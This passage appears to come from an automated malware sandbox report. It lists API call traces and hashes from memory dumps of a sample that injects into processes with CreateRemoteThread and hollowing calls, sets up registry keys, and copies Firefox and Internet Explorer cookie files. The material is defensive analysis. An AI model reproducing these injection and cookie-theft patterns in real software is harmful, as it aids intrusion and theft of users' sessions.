    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3D4D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 38registry
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
